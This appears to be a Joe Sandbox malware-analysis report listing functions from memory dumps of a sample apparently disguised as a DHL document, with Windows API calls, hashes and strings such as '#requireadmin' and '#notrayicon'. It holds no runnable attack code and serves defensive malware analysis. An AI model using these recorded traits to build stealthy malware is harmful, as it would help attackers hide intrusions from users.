Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j
API String ID: 2173805711-1860680129
Opcode ID: eb87216ed0488e9562718cb99c4c3d8503b1a129ac914a9365a50e0e7fe873b4
Instruction ID: 6cb30cd228519de843451cbca5b724e83a9367ef673a35e16f9c22b6b72a9aab
Opcode Fuzzy Hash: eb87216ed0488e9562718cb99c4c3d8503b1a129ac914a9365a50e0e7fe873b4
Instruction Fuzzy Hash: 6A317075618346DFCB05AFA4E8999BD3776FF55700B2004A8F9034BAE2C7749932DB90

Function 0022304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0022335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00223077,?,?), ref: 00223378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0022307A
_wcslen.LIBCMT ref: 0022309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00223106

Strings

255.255.255.255, xrefs: 00223095, 0022309A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 9c1153835fb874d178e0ddf469b27f285cc61e1d93c0295a1e28b0dadaf3a761
Instruction ID: 7936915b77fa47dce4ecc334ba8bddc17f8ec591f5528eb8bedac92255bfb2d1
Opcode Fuzzy Hash: 9c1153835fb874d178e0ddf469b27f285cc61e1d93c0295a1e28b0dadaf3a761
Instruction Fuzzy Hash: A131D539214226AFCB10CFA8E485EA977E0EF15318F248059E9158B392DB7ADF55CB70

Function 00234653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00234705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00234713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0023471A

Strings

msctls_updown32, xrefs: 00234684

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: e11a84eb13b1a513b0bd2135b9420d26d5741698824d37bea6e7319b282324e9
Instruction ID: f32701a59ade90605ddb85a5e2f5b8e46f5b5452e2e16687d4d508354390bb72
Opcode Fuzzy Hash: e11a84eb13b1a513b0bd2135b9420d26d5741698824d37bea6e7319b282324e9
Instruction Fuzzy Hash: DC215EB5610209AFDB10EF68EC95DA777ADEF5A3A4B140059FA049B251CB70FC62CB60

Function 002095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0020961D

Strings

#notrayicon, xrefs: 002095B7
#requireadmin, xrefs: 002095D9
#OnAutoItStartRegister, xrefs: 002095F3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 25afd18b1b96c7b0396bec4394fdf149af61c733b2880af85d4a5e1083253f3a
Instruction ID: 379c3fd5d7ad1c2a3bc3f11b278ff81640522ece0b2925356c11c5ffa4d57a41
Opcode Fuzzy Hash: 25afd18b1b96c7b0396bec4394fdf149af61c733b2880af85d4a5e1083253f3a
Instruction Fuzzy Hash: 0A210B7212471266D331AE259C02FB7779C9F75310F544029F94B971C3EB91DDA1C295

Function 002337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00233840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00233850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00233876

Strings

Listbox, xrefs: 0023380F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a656845efc735b6214166b4fa9a5e2116263c06a1a2bc33c1d5b97c8f1d80f57
Instruction ID: 5ab75f3f3284a7bea0e0b3fb0508979844a83231374fbd9df698e32dea861af8
Opcode Fuzzy Hash: a656845efc735b6214166b4fa9a5e2116263c06a1a2bc33c1d5b97c8f1d80f57
Instruction Fuzzy Hash: E321A4B2620219BBEF21CF54DC45FBB776EEF89764F118114F9049B190C671DD628BA0

Function 002149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00214A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00214A5C
SetErrorMode.KERNEL32(00000000,?,?,0023CC08), ref: 00214AD0

Strings

%lu, xrefs: 00214A6F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 9bf397b744a76c587b9c4f15c5ee8f8fb242be541aca1578f99ea0bea0cd814d
Instruction ID: 97cba1810d43f02f4803aa35cdb35929f561aecdb40fd7de82599b0cc64c0c7a
Opcode Fuzzy Hash: 9bf397b744a76c587b9c4f15c5ee8f8fb242be541aca1578f99ea0bea0cd814d
Instruction Fuzzy Hash: E5318575A00109AFD710DF54C885EAE7BF8EF09314F1480A5F909DB252D771EE85CBA1

Function 002341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0023424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00234264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00234271

Strings

msctls_trackbar32, xrefs: 00234226

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c16510d7954907c2587c481b1bc56d32c92e6c72f0d4f3ac53babf9feafae003
Instruction ID: 3af2585345038cb33d6d55e99a772ef0420a2d1d15ab54e2b2cdf59974c6ddf8
Opcode Fuzzy Hash: c16510d7954907c2587c481b1bc56d32c92e6c72f0d4f3ac53babf9feafae003
Instruction Fuzzy Hash: 35110671250208BFEF206F29DC06FAB3BACEF95B64F110114FA55E60A0D271EC619B10

Function 00202F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

Part of subcall function 00202DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00202DC5
Part of subcall function 00202DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00202DD6
Part of subcall function 00202DA7: GetCurrentThreadId.KERNEL32 ref: 00202DDD
Part of subcall function 00202DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00202DE4

GetFocus.USER32 ref: 00202F78

Part of subcall function 00202DEE: GetParent.USER32(00000000), ref: 00202DF9

GetClassNameW.USER32(?,?,00000100), ref: 00202FC3
EnumChildWindows.USER32(?,0020303B), ref: 00202FEB

Strings

%s%d, xrefs: 00202FFF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 906196ec9809599bce58068a9778a1ab0c258e9ec5a53f8b3f0a46ae2d2ccf01
Instruction ID: 4aa91fb1dc6986570c4fe1a11476a5c2d23643529415fd2364766405e352463c
Opcode Fuzzy Hash: 906196ec9809599bce58068a9778a1ab0c258e9ec5a53f8b3f0a46ae2d2ccf01
Instruction Fuzzy Hash: 9311AC75310305ABCF01AF709C8AAEE776EAF95304F044076B909AB293DE3099598F60

Function 00235882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002358C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002358EE
DrawMenuBar.USER32(?), ref: 002358FD

Strings

0, xrefs: 0023588F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 7164315dba90fb7a677e32fe713c7026a7bc825ad64cc90e84d3fa4adda2670c
Instruction ID: 9670b6c3a7547d83664262eb942b4f123fdb91a02ead97c743245b68d5d6af78
Opcode Fuzzy Hash: 7164315dba90fb7a677e32fe713c7026a7bc825ad64cc90e84d3fa4adda2670c
Instruction Fuzzy Hash: CB018071510228EFDB219F11EC48BEEBBB4FF45360F108099E849E6151DB708AA4DF71

Function 0020007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee47a7223f7242acab3c207dd4d725205048fb0b64ba0a8ec5a3d60994128991
Instruction ID: b122dfdb9dd883f7dbf97817f647dd40b7f4b45a18270de495e9534f3a6df8dd
Opcode Fuzzy Hash: ee47a7223f7242acab3c207dd4d725205048fb0b64ba0a8ec5a3d60994128991
Instruction Fuzzy Hash: E2C13A75A1020AAFEB15CF94C894BAEB7B5FF48304F108598E905EB292D771EE51CB90

Function 0022342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00223459
CoUninitialize.OLE32 ref: 00223463
VariantInit.OLEAUT32(?), ref: 0022346E
VariantClear.OLEAUT32(?), ref: 0022371B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 42e9f0508a1426714bf2908168557ede8799bc7b42c596fac68a388a1c5c8a52
Instruction ID: 7a40a2aa8098fd9c885b13a09e3b7e442768a656fc2030af13aa7c0821c9af23
Opcode Fuzzy Hash: 42e9f0508a1426714bf2908168557ede8799bc7b42c596fac68a388a1c5c8a52
Instruction Fuzzy Hash: 37A16E79614311AFC700EF64D485A2AB7E9FF8D710F048859F9899B3A2DB34EE11CB91

Function 00200436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0023FC08,?), ref: 002005F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0023FC08,?), ref: 00200608
CLSIDFromProgID.OLE32(?,?,00000000,0023CC40,000000FF,?,00000000,00000800,00000000,?,0023FC08,?), ref: 0020062D
_memcmp.LIBVCRUNTIME ref: 0020064E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 61a80b6f2153fe8ea83d2ea3f32809b98f2456328c277b2894d9d9e9570b22cd
Instruction ID: c251f5981bac0d8125eb91463125b0b4f0377fdeb6768a3f331aea90eb676033
Opcode Fuzzy Hash: 61a80b6f2153fe8ea83d2ea3f32809b98f2456328c277b2894d9d9e9570b22cd
Instruction Fuzzy Hash: 61815E71A10209EFDB04DF94C984EEEB7B9FF89315F204558F506AB291DB71AE06CB60

Function 001E1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001E14C0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c09de11e8124a13d428087d4a9bc8f4e6d90dbfaa024a46025036f223890e231
Instruction ID: b9775a532993c5e3205257989f2523f9d33b769643944b84fdfea71b7ecc2bfe
Opcode Fuzzy Hash: c09de11e8124a13d428087d4a9bc8f4e6d90dbfaa024a46025036f223890e231
Instruction Fuzzy Hash: BA412C31600950BBDB256BBA9C45BBE3AE5FF62370F14426AF419D73D2E734C8419262

Function 00236278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(010FE7C0,?), ref: 002362E2
ScreenToClient.USER32(?,?), ref: 00236315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00236382

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 742403977fb830239ea8a50da144099ce0a9a3faf7d41598596468d8f2386792
Instruction ID: 71b7d1c6f7ffe9d29371d67d52f21222c0ebc7b39963875639a3c514bf421f33
Opcode Fuzzy Hash: 742403977fb830239ea8a50da144099ce0a9a3faf7d41598596468d8f2386792
Instruction Fuzzy Hash: 83515EB591020AEFCF14DF58D8889AE7BB9FF45760F208199F9159B2A0D730EDA1CB50

Function 00221AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00221AFD
WSAGetLastError.WSOCK32 ref: 00221B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00221B8A
WSAGetLastError.WSOCK32 ref: 00221B94

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 6bd89c5807ba4524797fe576f4dab895f8d875a85c561b84f87d0fce5fcb409c
Instruction ID: 72f1ad3779f16b074697374d8b200683aa3d574ff16285249cc6dcb077edf730
Opcode Fuzzy Hash: 6bd89c5807ba4524797fe576f4dab895f8d875a85c561b84f87d0fce5fcb409c
Instruction Fuzzy Hash: 3E41D278600210AFE720AF24D88AF2A77E5AF55718F54844CF91A9F3D3D772DD528B90

Function 001DB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3f4a1256e993749b977aa1a9bc9ec742168c1776e2a8a99c4f5bb0e2945a0
Instruction ID: 0ad52fc19a0296e5c69dd9eeb33007ce18aa139a8c35994efc585dbd3ef8fa38
Opcode Fuzzy Hash: 15c3f4a1256e993749b977aa1a9bc9ec742168c1776e2a8a99c4f5bb0e2945a0
Instruction Fuzzy Hash: 0041CF72A04644EFD724DF38C881BAEBBA9EB98710F11452FF1539B382D771A9018790

Function 002156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00215783
GetLastError.KERNEL32(?,00000000), ref: 002157A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002157CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002157FA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 857999db2367a655500c04a3220469400c1618ce13abcfa46718d8c4f477b450
Instruction ID: 26aeccb0b5d98175bd8476d22701b6f86c09771d8f154f0844231a31d90c9b37
Opcode Fuzzy Hash: 857999db2367a655500c04a3220469400c1618ce13abcfa46718d8c4f477b450
Instruction Fuzzy Hash: 86411D39610611DFCB11EF15D585A5EBBE2EF99320F198488EC4A6B3A2CB34FD41CB91

Function 001DD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001C6D71,00000000,00000000,001C82D9,?,001C82D9,?,00000001,001C6D71,8BE85006,00000001,001C82D9,001C82D9), ref: 001DD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001DD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001DD9AB
__freea.LIBCMT ref: 001DD9B4

Part of subcall function 001D3820: RtlAllocateHeap.NTDLL(00000000,?,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6,?,001A1129), ref: 001D3852

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7cc8a86d24050cfc92397f74b71aec9f5d3bd46ae4eb8ee56bb8aa28a24b61eb
Instruction ID: 36ef060dda2c80659e57cf0cd67c7eda17f017efa01ad57bd41b739a89009cd1
Opcode Fuzzy Hash: 7cc8a86d24050cfc92397f74b71aec9f5d3bd46ae4eb8ee56bb8aa28a24b61eb
Instruction Fuzzy Hash: B031F272A0020AABDF29DF64EC95EAE7BA5EF40314F164169FC04D7250EB36DD50CB90

Function 002352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00235352
GetWindowLongW.USER32(?,000000F0), ref: 00235375
